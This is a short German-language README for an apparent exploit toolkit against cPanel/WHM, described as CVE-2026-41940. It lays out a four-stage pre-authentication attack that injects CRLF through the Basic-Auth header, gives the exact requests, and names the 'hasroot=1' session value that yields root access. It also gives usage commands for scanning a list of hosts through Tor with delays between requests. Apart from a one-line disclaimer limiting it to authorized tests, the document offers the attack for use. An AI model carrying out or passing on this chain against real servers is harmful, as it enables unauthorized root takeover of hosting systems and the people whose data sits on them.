
cPanel/WHM CVE-2026-41940 CRLF-Injection-Authentifizierungs-Bypass-Exploit
cPanel/WHM Sicherheits-Test-Toolkit. Implementiert die CVE-2026-41940 CRLF-Injection Authentifizierungs-Bypass und Post-Exploitation-Privilegien-Pivoting.
| Skript | Zweck |
|---|---|
cpanel_exploit.py | CVE-2026-41940: CRLF-Injection → WHM-Auth-Bypass → Root-Zugriff |
Typ: CRLF-Injection → Authentifizierungs-Bypass → Root-RCE
Betroffen: cPanel/WHM < gepatchte Versionen
Angriff: Pre-Auth-CRLF-Injection im Basic-Auth-Header injiziert in die serverseitige Session-Datei und erhöht eine nicht authentifizierte Session auf WHM-Root.
hasroot=1Stufe 1: POST /login/?login_only=1 → erstellt Pre-Auth-Session
Stufe 2: GET / Authorization:Basic <CRLF> → injiziert hasroot=1, leakt cpsess-Token
Stufe 3: GET /scripts2/listaccts → löst Session-Cache-Propagation-Gadget aus
Stufe 4: GET /cpsess[TOKEN]/json-api/version → HTTP 200 + Version = ROOT-ZUGRIFF
pip install requests
python cpanel_exploit.py -t target.com
python cpanel_exploit.py -l whm_hosts.txt --tor --delay 2
python cpanel_exploit.py -t target.com --verify-only # nur CRLF-Check, keine Priv-Esc
Nur für autorisierte Penetrationstests.